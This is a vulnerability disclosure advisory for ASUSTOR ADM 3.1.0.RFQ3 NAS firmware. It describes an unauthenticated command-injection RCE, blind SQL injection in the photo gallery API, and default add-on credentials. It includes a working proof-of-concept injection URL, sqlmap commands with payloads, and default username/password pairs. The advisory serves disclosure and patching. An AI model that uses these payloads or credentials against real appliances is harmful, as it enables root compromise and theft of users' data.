ASUSTOR ADM 3.1.0.RFQ3 Remote Command Execution / SQL Injection

Credit: Kyle Lovett
Risk: High
Local: No
Remote: Yes

Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds Vendor - Patch Notes - Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from multiple critical vulnerabilities. The vulnerabilities were submitted to Asustor in January and February 2018. Several follow-up requests were made in an attempt to obtain vendor acknowledgement, however no correspondance was ever received. Nevertheless, the vendor did patch the RCE issue in the 3.1.3 ADM release on May 31, 2018. Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3. ----------------------------------------------------------------------------------- CVE-2018-11510 Remote Command Execution (Unauthenticated) CWE-78 - Improper Neutralization of Special Elements used in an OS Command ASUSTOR ADM - 3.1.0.RFQ3 ------------------------------------------ Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an unauthenticated remote code execution vulnerability in the portal/apis/aggrecate_js.cgi file by embedding OS commands in the 'script' parameter. The application fails to santitize user input after the cgi file executes a call to a local shell script. Example POC: https://<IP>:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22 Exploitation of this vulnerability allows an attacker execution of arbitrary commands on the host operating system, as the root user, remotely and unauthenticated. This is a complete compromise of the appliance. Exploits with Metasploit module can be found here: ------------------------------------------------------------------------------------ CVE-2018-11511 Blind SQL Injections CWE-89: Improper Neutralization of Special Elements used in an SQL Command ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3 ------------------------------------------ Weakness : The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI. POC sqlmap -u "https://<IP>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql Parameter: album_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: album_id=106299411 AND 4644=4644&start=0&limit=100&order=name_asc&api=v2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: album_id=106299411 AND SLEEP(5)&start=0&limit=100&order=name_asc&api=v2 sqlmap -u "https://IP/photo-gallery/api/photo/search/" --data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2" --random-agent --dbms=mysql --risk=2 Parameter: scope (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: keyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2 ------------------------------------------------------------------------------------ CVE-2018-11509 Default credentials and remote access (Multiple Applications) CWE-255 Credentials Management ASUSTOR ADM 3.1.0.RFQ3 ------------------------------------------ Weakness : When the end user completes setup for the ASUSTOR Nas appliance, a single congratulations web page appears, usually on port 80, stating setup is complete. This "setup complete" web page however is served publicly, and is available to anyone with no authentication. >From this page it is possible to access all of the add-on applications the end usr installs on the NAS, which are available from their online repository, by simply browsing to each add-on directory. For many of these apps, for example phpmyadmin. virtualbox, owncloud, photo-gallery, etc., the files are installed under the /volume1/Web/ folder, which is t the same directory as the 'setup complete' page is located. URL http://<IP>/phpmyadmin/ username/password - root:admin URL http://<IP>/virtualbox/ username/password - admin:admin URL http://<IP>/wordpress/ setup file available The application does prompt the user to change the admin account for the NAS itself, however, the end user is never prompted to change the default passwords on the add-on applications. This allows an attacker root level access to the application which in turn can be used to upload a webshell onto the appliance. It also allow access to all data the end user uploads to the NAS. Furthermore, the NAS itself has a default account nvradmin, which has permission to log into the admin portal. While the nvradmin account does not have most admin permissions, it still allows an attacker to access many of the browser file functions, and gain a foothold on the appliance. URL http://<IP>:8001/portal/ username/password nvradmin:nvradmin An attacker can determine installed applications and attack default credentials that are not changed upon NAS initialization, which enables them to compromise end user data or gain root access on the appliance. ----------------------------------------------------------------------------------- [Researchers] Kyle Lovett - (twitter - @SquirrelBuddha) Matthew Fulton (twitter - @haqur)

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